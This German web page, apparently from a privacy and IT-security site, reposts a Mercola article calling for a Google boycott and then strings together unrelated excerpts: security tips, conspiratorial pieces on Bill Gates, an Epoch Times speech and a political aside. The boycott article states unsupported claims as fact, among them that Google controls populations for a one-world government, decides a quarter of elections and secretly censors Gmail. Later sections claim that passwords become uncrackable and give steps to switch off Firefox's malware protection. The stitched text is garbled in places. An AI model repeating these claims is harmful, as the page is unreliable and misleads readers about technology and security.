Mercola.com zu einer der ersten Websites, die Google absichtlich daran hindert, unsere Artikel und Blogbeiträge zu aktuellen Themen zu indizieren. Die meisten von Ihnen wissen, dass ich schon seit einigen Jahren Bedenken über die Überwachungskapitalisten, allen voran Google, habe. Im September 2017 habe ich über die Partnerschaft von Google mit der National Alliance on Mental Illness berichtet und darüber, dass das Quiz zur Bewertung von Depressionen in Wirklichkeit ein vom Medikamentenhersteller Eli Lilly gesponserter Betrug war. Unabhängig davon, wie Sie die Fragen beantworteten, waren Sie ein Kandidat für Antidepressiva. Link zum Video OGLE HOME from Goopocalypse Now! on Vimeo. Seitdem haben Google und andere Technologieunternehmen immer tieferen und breiteren Zugang zu den persönlichen medizinischen Daten der Menschen erhalten, und der Verkauf dieser Daten durch Google an Dritte kann reale Folgen haben. Höhere Versicherungsprämien oder die Verweigerung einer Anstellung sind nur zwei offensichtliche Beispiele. Google wird von der Interaktion mit Mercola.com ausgeschlossen Die meisten von Ihnen wissen, dass Google uns im Sommer 2019 von allen Suchanfragen ausgeschlossen hat, es sei denn, unser Name wurde ebenfalls in die Suchanfrage eingegeben. Obwohl wir immer noch beträchtlichen Traffic von Leuten erhielten, die sehr hart danach suchten, Mercola-Artikel über Google zu finden, haben wir uns schließlich dazu entschlossen, Google davon abzuhalten, meine Artikel oder aktuelle Blogs zu crawlen oder zu indizieren. Wir haben 2018 auch aufgehört, das Google Analytics-Programm zu nutzen. Also wurde alles, was mit Google zu tun hat, von dieser Website entfernt, und ich hoffe, dass andere Websites diesem Beispiel folgen werden. Ich ermutige Sie, die Datenschutzrichtlinien jeder Website zu durchsuchen, um zu sehen, ob sie Google Analytics oder Google Ad-Programme verwenden, und wenn sie es tun, ermutigen Sie sie, damit aufzuhören. Wir können auch ohne die Überwachungsmonopole erfolgreich sein, und Unternehmen und Einzelpersonen müssen sich zusammentun, um alles in ihrer Macht Stehende zu tun, um den gefährlichen Diebstahl der Privatsphäre und die Datensammlung zu stoppen. Wie Sie für die Nutzung "kostenloser" Analysen durch Unternehmen bezahlen Ein Großteil der Websites nutzt das "kostenlose" Analyseprogramm von Google sowie dessen Werbeplattformen. Leider sind diese Dienste nicht wirklich kostenlos. Letztlich bezahlen SIE dafür mit Ihren persönlichen Daten, denn das ist das Produkt, das Google an Dritte weiterverkauft. Zusammengenommen stehlen all diese Websites eine enorme Menge Ihrer privaten Informationen. Google und seine datenfressenden Tentakel dringen tief in Ihr tägliches Leben ein und sammeln Daten über jeden Ihrer Schritte und jedes Gespräch, das Sie führen, ob online oder in der realen Welt. Auch wenn Sie die Standortverfolgung auf Ihrem Telefon deaktivieren, hat Google Möglichkeiten, Ihren Aufenthaltsort zu ermitteln, indem es die Adressen von Mobilfunkmasten in der Nähe verfolgt, mit denen sich Ihr Telefon verbindet. Dies ist einer der Gründe, warum ich Ihnen dringend empfehle, alle Android-Telefone loszuwerden und ein iPhone zu verwenden, das bessere Datenschutzrichtlinien hat. Ich habe dies in meinem 2018 erschienenen Artikel "Google - eines der größten Monopole der Welt" besprochen. Dieser Artikel enthält auch eine Liste von Beispielen für die Art von Daten, die von Google gesammelt werden, ob Sie sich dessen bewusst sind oder nicht. Unsere "kognitiven Freiheiten" stehen auf dem Spiel Wie in "Will Google´s Social Credit System Determine Your Future?" (Wird Googles soziales Kreditsystem über Ihre Zukunft entscheiden?) ausführlich beschrieben, gibt es nun Vorschläge, die vorschlagen, dass all diese Daten in Kombination mit künstlicher Intelligenz-gestützten Analysesystemen für eine "vorausschauende Polizeiarbeit" verwendet werden könnten, wie im Film "Minority Report" aus dem Jahr 2002, in dem mutmaßliche Straftäter verhaftet werden, bevor ein Verbrechen tatsächlich begangen wird. In dem oben genannten TED-Vortrag aus dem Jahr 2018 erörtert die Rechtswissenschaftlerin und Bioethikerin Nita Farahany die potenziellen Auswirkungen der Gedankenlesetechnologie und warnt, dass eine solche Technologie leicht zu einer Gesellschaft führen könnte, "in der Menschen verhaftet werden, wenn sie nur daran denken, ein Verbrechen zu begehen." Allerdings hat Google schon vor zehn Jahren behauptet, dass es in der Lage ist, Ihre Gedanken zu lesen. Im Jahr 2010 prahlte Google-CEO Eric Schmidt: "Wir wissen, wo Sie sind. Wir wissen, wo Sie gewesen sind. Wir können mehr oder weniger wissen, woran Sie denken." Zehn Jahre später sind Googles Fähigkeiten, Gedanken zu lesen, exponentiell gewachsen und wurden so weit perfektioniert, dass die KI genau den Moment vorhersagen kann, in dem sich ein Teenager unsicher, einsam oder verletzlich fühlt, so dass in diesem Moment eine Werbung für ein imageförderndes Produkt vor ihm auf dem Bildschirm erscheinen kann. Diese und viele andere erschreckende Möglichkeiten werden in dem Buch "The Age of Surveillance Capitalism" (Das Zeitalter des Überwachungskapitalismus) der Sozialpsychologin und Harvard-Professorin Shoshana Zuboff ausführlich beschrieben. Das folgende Video zeigt ein Interview, das ich mit ihr zu diesem Thema geführt habe. In ihrem TED-Vortrag geht Farahany auch auf die Gefahren einer Welt ein, in der "private Interessen unsere Gehirndaten verkaufen". Sie glaubt, dass wir als globale Gemeinschaft Gesetze brauchen, die unsere Rechte auf kognitive Freiheit schützen; Gesetze, die unsere Gedankenfreiheit und Selbstbestimmung schützen. Verabschieden Sie sich von Google Im Laufe der Jahre bin ich äußerst besorgt über Googles exponentielle Datenerfassung und das Eindringen in jeden erdenklichen Bereich unseres täglichen Lebens, von der Gesundheitsfürsorge und Fitness bis hin zu Bildung und Finanzen. Der Einfluss von Google ist so groß und doch so versteckt, dass die meisten Menschen keine Ahnung haben, wie sehr sie tatsächlich kontrolliert werden. Die meisten von uns würden vehement bestreiten, dass etwas so Einfaches wie die Google-Suchergebnisse uns so manipulieren kann, dass wir auf eine bestimmte Art und Weise über ein Thema denken, doch die Forschung zeigt eindeutig, dass diese Art der unterschwelligen Beeinflussung sehr stark ist. Interviewtranskript herunterladen Dr. Robert Epstein, der die letzten zehn Jahre seiner beruflichen Laufbahn damit verbracht hat, die manipulativen und betrügerischen Praktiken von Google als leitender Forschungspsychologe für das American Institute of Behavioral Research and Technology aufzudecken, hat ebenfalls gezeigt, wie leicht Google unsere politische und gesellschaftliche Landschaft verändern kann. Ohne Google würde der Traum der Technokraten von einer Eine-Welt-Regierung wahrscheinlich nie Wirklichkeit werden, da er auf Social Engineering und künstlicher Intelligenz beruht. Google ist ein Vorreiter und Experte in beiden Bereichen und hat die Fähigkeit, ganze Bevölkerungen zu kontrollieren. Wie Epstein in dem obigen Interview feststellte, stellt Google drei einzigartige Bedrohungen für die Gesellschaft dar: Google ist eine Überwachungsagentur mit erheblichen, aber verborgenen Überwachungsbefugnissen - Google Search, Google Wallet, Google Docs, Gmail, Google Drive, YouTube - all das sind Überwachungsplattformen, und aus der Sicht von Google liegt der Wert dieser Plattformen in ihrer Fähigkeit, sehr präzise Daten über Sie als Person zu sammeln. Die meisten dieser Plattformen bieten kostenlose Dienste aus dem einfachen Grund an, dass SIE das Produkt sind, das an Dritte verkauft wird. Sie sind eine Zensurbehörde, die in der Lage ist, den Zugang zu Websites im gesamten Internet einzuschränken oder zu sperren und so zu entscheiden, was die Menschen sehen können und was nicht. Während Abschnitt 230 des Communications Decency Act von 1996 die freie Meinungsäußerung für jedermann ermöglicht, erlaubt er Google und anderen Online-Plattformen, alles herauszufiltern und zu zensieren, was sie wollen. Das größte Problem bei dieser Art von Internetzensur ist, dass man nicht weiß, was man nicht weiß. Wenn eine bestimmte Art von Information aus der Suche entfernt wird und man nicht weiß, dass sie irgendwo existieren sollte, wird man nie danach suchen. Und wenn Sie online nach Informationen suchen, woher wissen Sie dann, dass bestimmte Websites oder Seiten überhaupt aus den Suchergebnissen entfernt wurden? Die Antwort lautet: Man weiß es nicht. So investiert Google beispielsweise schon seit geraumer Zeit in DNA-Repositorien und fügt unseren Profilen DNA-Informationen hinzu. Laut Epstein hat Google das nationale DNA-Repositorium übernommen, aber die Artikel darüber - die er in seinen eigenen Schriften zitiert hat - sind alle verschwunden. Sie haben die Macht, die öffentliche Meinung durch Such-Rankings und andere Mittel zu manipulieren, und die dadurch hervorgerufenen Veränderungen im Denken sind sowohl schnell als auch enorm. Epstein hat beispielsweise nachgewiesen, dass Google in der Lage ist, die Wahlpräferenzen von unentschlossenen Wählern um satte 48 % bis 63 % zu verändern und 25 % der weltweiten Wahlen zu bestimmen. Darüber hinaus ist diese Manipulation völlig unauffindbar und lässt sich nicht zurückverfolgen. Die vielen Gründe, Google loszuwerden Für Sie als Nutzer gibt es viele Gründe, Ihr Leben von Google zu befreien, darunter die folgenden: Bedenken hinsichtlich des Datenschutzes - Googles Dienste, einschließlich Suche, E-Mail und Karten, sammeln große Mengen an persönlichen Daten, die den Browserverlauf, Standortdaten und mehr umfassen können. Diese Sammlung ist ein wesentlicher Bestandteil des Geschäftsmodells von Google, das sich auf gezielte Werbung konzentriert. Weitere Bedenken hinsichtlich des Datenschutzes sind u. a. folgende: Verfolgung Ihres Aufenthaltsortes rund um die Uhr - Im Jahr 2022 verklagten vier Generalstaatsanwälte Google wegen seiner betrügerischen Praktiken bei der Erfassung von Standortdaten, da das Unternehmen auch dann noch Standortdaten erfasst, wenn die Nutzer die Standortverfolgung deaktiviert haben. Durch die Verfolgung Ihrer Google-Kalendereinträge in Kombination mit Ihren Standortdaten weiß Google auch, welche Veranstaltungen Sie wann und wie lange besucht haben. Auch auf die integrierte Webcam Ihres Telefons, Tablets, Laptops oder Computers können verschiedene Apps zugreifen. Ein Leben lang fotografische Beweise - Vor zwanzig Jahren waren Fotos eine private Angelegenheit, in der man sich in Fotoalben erinnerte und die man zu Hause ausstellte. Heute wird das Leben der Menschen online öffentlich zur Schau gestellt, und Google hält alles fest. In Kombination mit Gesichtserkennungssoftware und anderen technologischen Identifizierungsanwendungen, einschließlich Metadaten, die Zeit und Ort jedes Schnappschusses angeben, sind Ihre Fotos eine Fundgrube für private Informationen. Ein Leben lang kommunizieren - Google hat auch jede einzelne Gmail-E-Mail, die Sie jemals gesendet, empfangen und gelöscht haben. Zensur Ihrer E-Mails - Google kann auch Ihre E-Mails zensieren, und wir haben Beweise dafür, dass dies bereits geschieht. Während etwa 50 % unserer Abonnenten Gmail-Konten verwenden, liegt die Zustellungsrate für Gmail-Konten bei der HÄLFTE aller E-Mail-Anbieter wie ProtonMail - weit niedriger als bei jedem anderen E-Mail-Dienst. Wenn Sie also Gmail für den Empfang unseres Newsletters verwenden, wechseln Sie bitte sofort. Wenn Sie Gmail nutzen, sollten Sie sich darüber im Klaren sein, dass Ihr Posteingang zensiert wird, ohne dass Sie es merken. Gelöschte Dateien und Informationen - Wahrscheinlich löschen Sie hin und wieder Dateien und Informationen aus Sicherheitsgründen, oder? Sie könnten zum Beispiel beschließen, die Liste mit den Passwörtern auf Ihrem Handy zu löschen, falls Sie es verlieren oder es gehackt wird. Nun, Google hat immer noch alle diese Informationen. Marktbeherrschung und monopolistisches Verhalten - Googles marktbeherrschende Stellung bei der Suche, beim Videohosting (über YouTube) und bei mobilen Betriebssystemen (über Android) schränkt den Wettbewerb ein, was zu weniger Innovation und Auswahl für die Verbraucher führen kann. Datensicherheit - Obwohl Google behauptet, strenge Sicherheitsmaßnahmen zu haben, ist kein Dienst vor Datenschutzverletzungen oder Sicherheitslücken gefeit. In Anbetracht der riesigen Menge an persönlichen Daten, die von Google gesammelt werden, könnte eine Datenpanne verheerende Folgen haben. Echokammer- und Filterblaseneffekte - Die personalisierten Such- und Nachrichtenergebnisse von Google können eine "Filterblase" erzeugen, in der die Nutzer eher Informationen sehen, die ihrem bisherigen Verhalten entsprechen, was den Zugang zu anderen Ansichten einschränken und zu einem Echokammereffekt führen kann. Abhängigkeit und Dateneinschränkung - Die starke Abhängigkeit vom Google-Ökosystem kann zu einer Art von Einschränkung führen, bei der der Wechsel zu anderen Diensten aufgrund der riesigen Datenmengen und der Integration in die Google-Dienste schwierig wird. Um dies zu vermeiden, sollten Sie Ihre Dienstanbieter diversifizieren. Das kommende Sozialkreditsystem - Die Fähigkeit, jede erdenkliche Metrik zu überwachen und zu verfolgen, den Zugang zu Informationen zu zensieren und zu blockieren und die Fähigkeit, Meinungen zu manipulieren, macht Google zu einer unschätzbaren Ressource für das geplante Sozialkreditsystem, und je mehr Informationen sie über Sie haben, desto leichter können sie Sie manipulieren. So können Sie sich heute von Google verabschieden Wenn Sie über die Praktiken von Google zum Datendiebstahl besorgt sind, ist es an der Zeit, dass Sie die Google-Dienste nicht mehr nutzen. Sicher, Google bietet Komfort, aber das reicht nicht aus, um die vielen Übel des Unternehmens zu überdecken. Wenn Sie bereit sind, Ihre Privatsphäre zu schützen und sich von den Manipulationen der Internetmonopole zu befreien, finden Sie hier einige grundlegende Schritte, die Sie unternehmen können. Bitte geben Sie diese Tipps auch an Ihre Familie und Freunde weiter. Tauschen Sie Ihren Browser aus - Deinstallieren Sie Google Chrome und verwenden Sie stattdessen Brave oder Opera. Alles, was Sie in Chrome tun, wird überwacht, einschließlich der Tastenanschläge und jeder Webseite, die Sie jemals besucht haben. Brave ist eine großartige Alternative, die den Datenschutz ernst nimmt. Wechseln Sie Ihre Suchmaschine - Verwenden Sie keine Google-Suchmaschinen oder Google-Erweiterungen wie Bing oder Yahoo, die beide Suchergebnisse von Google beziehen. Verwenden Sie stattdessen eine Standard-Suchmaschine, die Datenschutz bietet, z. B. Presearch, Startpage, DuckDuckGo, Qwant und viele andere. Verwenden Sie eine sichere E-Mail - Schließen Sie Ihr Gmail-Konto und wechseln Sie zu einem sicheren E-Mail-Dienst wie ProtonMail. Wenn Sie Kinder haben, übertragen Sie deren Google-Schülerkonto nicht in ein persönliches Konto, wenn sie aus der Schule kommen. Wechseln Sie zu einem sicheren Dienst für die gemeinsame Nutzung von Dokumenten - Verwerfen Sie Google Docs und verwenden Sie eine Alternative wie Zoho Office, Etherpad, CryptPad, OnlyOffice oder Nuclino, die alle von NordVPN empfohlen werden. Löschen Sie alle Google-Apps von Ihrem Telefon und entsorgen Sie die Google-Hardware. Noch besser: Besorgen Sie sich ein entgoogeltes Telefon. Mehrere Unternehmen bieten diese mittlerweile an, darunter Above Phone. Vermeiden Sie Websites, die Google Analytics verwenden - Dazu müssen Sie die Datenschutzbestimmungen der Website überprüfen und nach "Google" suchen. Websites müssen offenlegen, ob sie ein Überwachungsinstrument von Dritten verwenden. Wenn sie Google Analytics verwenden, fordern Sie sie auf, zu wechseln! Verwenden Sie ein sicheres Nachrichtensystem - Um Ihre private Kommunikation geheim zu halten, verwenden Sie ein Nachrichtensystem, das eine Ende-zu-Ende-Verschlüsselung bietet, wie z. B. Signal. Verwenden Sie ein virtuelles privates Netzwerk (VPN) wie NordVPN oder Strong VPN - Dies ist ein Muss, wenn Sie Ihre Online-Privatsphäre schützen möchten. Verwenden Sie keine Google-Home-Geräte in Ihrem Haus oder Ihrer Wohnung - Diese Geräte zeichnen alles auf, was in Ihrem Haus passiert, sowohl Sprache als auch Geräusche wie Zähneputzen oder Wasser kochen, selbst wenn sie scheinbar inaktiv sind, und senden diese Informationen an Google zurück. Das Gleiche gilt für Googles Heimthermostat Nest und Amazons Alexa. Verwenden Sie kein Android-Handy, da es sich im Besitz von Google befindet. Verzichten Sie auf Siri, das alle Antworten von Google bezieht. Verwenden Sie kein Fitbit, da es vor kurzem von Google aufgekauft wurde und dem Unternehmen alle Ihre physiologischen Daten und Aktivitätswerte liefert, zusätzlich zu allem anderen, was Google bereits über Sie hat. Quelle: https://articles.mercola.com/sites/articles/archive/2024/03/20/ boycott-google.aspx?ui=ea07fce45283e1a8b25db0dffcc0b28441b8a3e3552b2ea91a8fc62d5c3a824b&sd=20230216&cid_source=dnl &cid_medium=email&cid_content=art1HL&foDate=false&mid=DM1541120&rid=2074063751 https://uncutnews.ch/benutzen-sie-immer-noch-google-6-gruende-ihr-leben-jetzt-zu-entgoogeln-tschuess-google/ 1000%Gooken1000% - IT-Sicherheit - LSB, OpenSource, ISO/EC 27701, 27018, 27001, TrusT, TÜV Rheinland, zahlreiche RFC: Ihr PC und Smartphone steigen nun in die Oberklasse auf... Willkommen auf Gooken zum Online Exkurs 1000%IT-Sicherheitfür Computer und Smartphone! Willkommen in der virtuellen Welt - Sicherheit und mehr im Internet, trojaner-info.de, 07.12.2021 Das Internet hat die Gesellschaft weitreichend verändert. Nicht einmal 50 Jahre ist es her, da war ein Fernsprecher im eigenen Haus noch eine Seltenheit. Heute aber surfen Milliarden Menschen jeden Tag durch die Weiten des Internets und das hat zu vielfältigen Veränderungen in zahlreichen Bereichen geführt. Ob Werbung oder Kriminalität, all das, was zuvor in der realen Welt stattfand, wurde heute zu einem Teil ins Netz verlagert. Doch wie schützt man sich eigentlich vor Kriminalität und welche Vorzüge bietet das Web für Unternehmen? [...] Es gibt zahlreiche Internet-Betrugsmethoden und Kriminelle werden hierbei grundsätzlich immer erfinderischer. Mittlerweile sind allerdings auch die Behörden bereits hinter die Machenschaften gekommen und es werden vermehrt Polizeidienststellen mit der Aufklärung virtueller Kriminalität beschäftigt. Wer sich selbst in Sicherheit wiegen möchte, muss beim Surfen im Netz einige wichtige Faktoren beachten. https://www.trojaner-info.de/business-security/aktuell/willkommen-in-der-virtuellen-welt-sicherheit-und-mehr-im-internet.html Wir beginnen mit dem Situations-/Lagebericht "Computertechnik und Gesellschaft" aus unserem Teil News&Links, während die Maßnahmen zur Absicherung beidens (grünes) Häkchen fü,r Häkchen mit einfließen. "Hoffen wir, dass wir alle dem Grauen entkommen" Bill Gates unkontrollierte Macht: Entscheidungen mit globalen Auswirkungen und die drohende Bedrohung für die Zukunft der Menschheit, T.H.G., uncut-news.ch, 08.12.2023 Von Bali Solidarity Verschwörungstheorie? Lesen Sie weiter und entdecken Sie die Wahrheit! [...] Hoffen wir, dass wir alle dem Grauen entkommen. Quelle: https://balisolidarity.substack.com/p/bill-gates-unchecked-power-decisions?r=3192of https://uncutnews.ch/bill-gates-unkontrollierte-macht-entscheidungen-mit-globalen-auswirkungen-und-die-drohende-bedrohung-fuer-die-zukunft-der-menschheit/ Mensch, was mach ich (Gooken) bloß? Finde ich die einen gut, wie die anderen mich?, imfalle zweier großer, verfeindeter Mächte, frei nach J.M. Simmel zur NS-Zeit in Deutschland: "Es muss nicht immer Kaviar sein" über die Ohnmacht des Einzelnen. Gooken: unabhängig - unparteiisch - tatsachengetreu - meinungsfreudig Auf unseren Webseiten einsichtige Berichte müssen nicht unserer Meinung entsprechen., Red., Gooken, 2017 USA/Das Imperium hat von sowas Gutem noch nie gehört : Darunter Linux Mint (beim Rest solls hier mal bleiben (darunter Ernährungs- und Gesundheitstipps nämlich), ...., na schön, z.B. ...). Wir aber. Auf uncut-news.ch (Gesundheitsfirma aus Florida, Dr. Mercola, und andere). Uncut-news.ch: "Wir werden nicht von Vereinen, Verbänden, Parteien oder sonstigen Lobbygruppen unterstützt. Wir schalten keine Werbung, wir belästigen auch nicht mit lästigen Pop-ups oder nötigen unsere Besucher, den Adblocker zu deaktivieren. Unterstütze unsere Unabhängigkeit!" Grußwort zur Weihnachtsfeier der "Epoch Times" Wahrhaftigkeit, Unabhängigkeit - und etwas mehr,, Carlos A. Gebauer, epochtimes.de, 22.12.2023 Der Philosoph und Publizist Carlos A. Gebauer lädt ein, über die rechte, sprich richtige Weise eines guten Umgangs miteinander zu reflektieren, darüber, welchen Befehlen es nottut zu folgen sowie über die Bedeutung eines demütigen Selbstzweifels - gerade für diejenigen, die sagen, wo es langgeht. Eine Rede anlässlich der Weihnachtsfeier der Epoch Times. Ich danke für die freundliche Einladung zu Ihrer Weihnachtsfeier und für die besondere Ehre, bei dieser Gelegenheit einige weihnachtliche Jahresabschlussgedanken formulieren zu dürfen. https://www.epochtimes.de/feuilleton/meinungen/wahrhaftigkeit-unabhaengigkeit-und-etwas-mehr-a4525056.html Netzpolitik.org, 22.12.2023 Lizenz: Die von uns verfassten Inhalte stehen, soweit nicht anders vermerkt, unter der Lizenz Creative Commons BY-NC-SA 4.0 https://netzpolitik.org/ 1000% Sicherheit: nach Gooken immer ganz konkret - nicht nur für Linux, sondern auch für MS Windows und Smartphones (Sektion Smartphones abermals siehe Menü links) - ob Android oder iPhone! ( Es ist mit solchen Distributionen ähnlich wie zur Zeit mit dem mehrfach vorbestraften notorischen Lügner Trump: Kaum einer will ihn als Präsidenten, sogar viele ihm Anvertraute springen von ihm ab, indem sie und Presse ihm alles mögliche nachsagen, beziehen sich aber nach dem einen oder anderen "Manöver" des Trump-Teams wie beispielsweise Benennung eigener Richter des Supreme Courts nicht (konkret) genug auf seine in der seit über 150 Jahren in unveränderter Form vorliegenden amerikanischen Verfassung liegenden, immer noch bestehenden ganzen Rechtmäßigkeit- um die es mit ihm als rechtmäßigen US-Präsidenten ausschließlich gehen dürfte..., Einzelheiten siehe bei uns unter News&Links#Trump ) Kundensupport (ggfls. einschließlich Kundenservice) / Customer Care (might be including customer service too) Sicherheitstechnische Situation: Die Informationsflüsse von Hardware und Software nehmen mit dem Neuerwerb ab Werk (Werkseinstellungen) im allgemeinen zunächst meist voll und ganz Kurs auf bestimmte Hersteller bzw. Firmen und Behörden aus meist USA (sagen wir mit Endorientierungspunkt NY - "Zielkoordinate Nullgrad Null") und erst von dort aus über Datenhandel an weitere (zurück vor Ort). Über Maßnahmen und Einstellungen an den Geräten lässt sich diese Gegebenheit auf Wunsch des Kunden aber (auf meist recht mühsame Art und Weise und nur je nach Hersteller, Hardware (Gerät) und Software) ändern, indem die mit kleinen grünen Häkchen für Computer und Smartphone mit Übertragbarkeit auf auch andere Geräte vorgestellten Maßnahmen aus unserem Online-Exkurs schrittweise befolgt werden. Beachte: In einigen wenigen Fällen kann dabei allerdings sogar die Hersteller-Garantie erlischen. Wir denken hier insbesonders bereits an das Aufschrauben irgendeines Geräts wie auch an die zum Rooten des Smartphones erforderliche Entsperrung des Bootloaders. Ideal für Einsteiger, Fortgeschrittene und Profis auf der Suche nach der nachvollziehbaren und sicheren Konfiguration von Anfang an wie auch Experten zur Ausformulierung von Endstufen Superuser root wird mit Linfw3 restlos entmachtet: Nur noch der "eigene root" (der eigene Systemadministrator) besitzt die Generalvollmacht über das eigene System! Auch der X-Server (X, X11) und andere Gerätetreiber können damit nicht mehr ins Netz! Selbst System- und Benutzer-Passwörter können mit Linfw3 (und Einstellungen aus diesem Exkurs) nicht mehr gecrackt werden. Sie bleiben selbst imfalle ihrer Bekanntgabe für andere völlig wirkungslos! Gooken empfiehlt Pale Moon (falls Ihr Prozessor kein AVX unterstützt, ab Version 33.3.0 von https://ftp.palemoon.org/AVX/linux). Mit den Browser-Erweiterungen/Extensions und Einstellungenin in user.js sind sie ohne Restriktionen hinnehmen zu müssen, völlig frei von allen Trackingskripte, Webbugs, Adware, Standortbestimmung, unerwünschten Verbindungsaufnahmen usw., kurzum frei von allen Gefahren mit Browsern wie Firefox und der wahlweise auf Firefox 29 bzw. 36 oder Firefox Quantum aufstetzende, sorgsam durchgepatchte Pale Moon! Online Banking and Online Shopping etc. with internet-browser Pale Moon, Text by Gooken, 06.12.2023 Online-Banking und Online Shopping etc. mit dem Internet-Browser Pale Moon For online banking and shopping like Ebay create one more new profile as free from Pale Moon- and Firefox-extensions as possible. Für Online-Banking und Online-Shopping etc. wie z.B. auf Ebay empfiehlt sich in Pale Moon die Anlage eines weiteren, neuen Profils frei von Erweiterungen. Brave Browser Auch der Web-Browser Brave will den Nutzer vor dem Tracken durch Werbung schützen. Zum Ausblenden der Werbung nutzt Brave Filterlisten, wie sie auch Adblock PLus für alle Browser verwendet. Darüber hinaus bietet Brave alternative Werbeflächen an, die von dem Werbedienst des Browser-Herstellers vermarktet werden. Diese Werbung macht die Nutzerdaten nicht trackbar und zudem kann der Anwender selbst entscheiden, ob er die Ads sehen will. Stimmt er dem Anzeigen zu, soll er an den Einnahmen durch die Werbung beteiligt werden. Der Brave Browser läuft unter Windows, Linux, Mac OS X sowie Android. Zudem lässt sich der Quellcode herunterladen (OpenSource, Engine: Chrome). Quelle: Brave | Heise Download, https://www.heise.de/download/product/brave-97522 Zu denken gibt uns allerdings ein wenig sein Umfang der Größe von 270 MB (vergleiche Pale Moon von um die 40 MB)... Firefox and Google Safebrowsing in Firefox deaktivieren, wiki.systemli.org Seit der Version 3 des Webbrowsers Firefox wurde ein Feature eingebaut, welches die Endanwender vor Phising1) und Malware2) schützen soll. Dabei kommt jedoch ein äußert krudes Tool zum Einsatz. Das von Google entwickelte "Safebrowsing" Tool überprüft übertragene URLs mit einer eigenen Datenbank. Zusätzlich wird in einem regelmäßigen Zeitintervall eine aktuelle Liste solcher Seiten von Google gezogen, damit nicht jede URL erst übertragen werden muss. Die Dokumentation des Dienstes ist sehr ungenau und lässt viel Platz für Spekulationen3). Es existieren zwei Versionen in denen es Unterschiede zur Übertragung gibt. Eine besagt die URL wird in einem speziellen Hashing Verfahren (nicht offen dokumentiert) übertragen, die andere meint das URL, Browsertyp und Browsersprache übertragen wird und dies im Klartext (ohne Hashing Verfahren). Bei beiden ist jedoch identisch, dass die IP-Adresse des Computers übertragen und gespeichert wird. Dabei ist es egal ob man Anonymisierungsdienste benutzt oder nur lokal browst, sobald eine Internetverbindung besteht und man Firefox benutzt wird er versuchen ab und an die Verbindung zu Google aufzunehmen. Wir raten allen die für ihre Sicherheit selbst sorgen wollen, dieses Feature abzustellen. Im Folgenden dokumentieren wir noch ein paar Feinheiten des Ganzen und erklären, wie es im Browser Hausverbot bekommt. Wie merke ich das? Nun ja. Man muss dazu den Aktivitäten seines Netzwerkes etwas genauer unter die Lupe nehmen. Dazu benutzt man einfach Wireshark4). Dieses Programm zeichnet den gesamten Traffic eures Netzwerkes mit und ihr könnt ihn durch Filtereinstellungen so beschränken das ihr nur seht, wenn Safebrowsing nach Hause telefoniert. Dazu ein Bild wie es in Wireshark aussieht, wenn Safebrowsing ein Update macht. Gegenmaßnahmen "about:config" aufrufen "safebrowsing" suchen Doppelklick auf "browser.safebrowsing.enabled" und false setzen Doppelklick auf "browser.safebrowsing.malware.enabled", false setzen https://wiki.systemli.org/security/firefox/safebrowsing Wir empfehlen darüber hinaus die Anonymisierung mit Tor (The Onion Router). Von Gooken-News&Links Viele gehen schon im Vorfeld ins Netz Handy aus der Tasche und Zap ! Gegebenenfalls wird im Westen gerade damit Geld verdient Computer, Handy, ...: damit, mit diesen Geräten, kann man für alles Weitere nicht nur sich selbst, sondern auch soziale Kontakte wie von selbst bestens an oft Google inc. und Facebook und somit viele andere, übergeben und durchprüfen ("gehirnspiegeln und durchröntgen") lassen - je weniger man sich um das IT-Sicherheitsniveau dieser Geräte kümmert ! Beim Computer gehts da insbesonders mehr um dessen Schutz vor Werbung, Hackern und Trojanern, so auch im Netz (Tor-Netzwerk - Bestandteil des NSA-Netzwerks?), aber auch um all die E-Mail, darunter über Adressaten immer mehr Aufschluss gebende Spam, Freemailer usw.. Haken: Der Schutz der eigenen Person durch Geschäftskreise ebensolcher Geräte (gibts ihn überhaupt - noch real?) und Behörden ist mit einer Erhöhung des IT-Sicherheitsniviaus, angefangen mit von Standort übertragenden Handy-Notdiensten und Katastrophen-Warn-Apps, weniger oder nicht mehr gegeben..., Gooken, 20.02.2023 Gefahr im Internet Cybersicherheit Kritische Infrastruktur in Gefahr?, tagesschau.de, 09.01.2023 Die Zahl von Cyberattacken nimmt weltweit stark zu. Besonders im Fokus steht die sogenannte Kritische Infrastruktur wie etwa Stromnetze. Wie gut kann sie vor Angriffen aus dem Netz geschützt werden? Kritische Infrastrukturen (KRITIS) stellen Strom und Wasser zur Verfügung, sichern den Verkehr und die medizinische Versorgung. Sie umfassen all die Einrichtungen und Systeme, die ein Gemeinwesen braucht, um zu funktionieren. Fallen sie aus, kann das zu Problemen bei der Versorgung und der öffentlichen Sicherheit führen. Digitale Bedrohungslage verschärft sich Weltweit sind Kritische Infrastrukturen immer stärker bedroht, und zwar besonders durch Cyberangriffe. Für das Jahr 2022 beläuft sich der durch sie verursachte Schaden in deutschen Unternehmen geschätzt auf mehr als 200 Milliarden Euro. Martin Voss, Professor für Krisen- und Katastrophenforschung an der Freien Universität Berlin, sieht die Lage kritisch: "Wir haben uns die Schwachstellen in der digitalen Infrastruktur so gezimmert, dass Cyberangriffe weitgehend unterschätzt werden. Was schon alles an Daten abgeflossen ist, kann in der Regel niemand sagen." Ein Problem: Die Bedrohungsszenarien ändern sich ständig. Bei sogenannten DDoS-Angriffen werden Server mit so vielen Anfragen überschüttet, dass sie zusammenbrechen. Eine wesentlich aufwändigere Methode ist ein APT, ein "advanced persistent threat". Dahinter können Hackerkollektive stecken, die gezielt in IT-Netzwerke eindringen und diese langfristig ausspionieren. Die wohl größte Bedrohung geht jedoch von Ransomware aus: Über das Aufrufen eines korrumpierten Links in einer E-Mail dringt Malware in das System ein. Diese verschlüsselt dann zum Beispiel alle Daten und gibt sie erst nach Zahlung eines Lösegelds wieder frei. Größerer Schaden lässt sich dann meistens nur noch abwehren, wenn man den Forderungen der Erpresser nachkommt. https://www.tagesschau.de/wissen/technologie/infrastruktur-cybersicherheit-cyberattacken-101.html Von Beruf Hacker: Programmierte (Un-)Sicherheit 11KM: der tagesschau-Podcast, tagesschau.de, 28.02.2023 Benjamin Gnahm ist Hacker, gehört zur internationalen Hacker-Elite. Er sucht die Herausforderung, findet Schwachstellen und knackt Systeme. Manchmal legal, manchmal illegal. Schon als Jugendlicher hat er den Kopierschutz von Computerspielen gecrackt. Heute schließt er Sicherheitslücken bei einem großen IT- Unternehmen, hat aber auch schon an Überwachungssoftware für Geheimdienste mitgearbeitet. Die BR-Wirtschaftsjournalistin Lisa Wurscher hat den Hacker getroffen und erzählt bei 11KM über die politischen und gesellschaftlichen Dilemmata dieses Jobs. Die Dokumentation über Benjamin Gnahm: Mit Hacken zum Top-Verdiener: 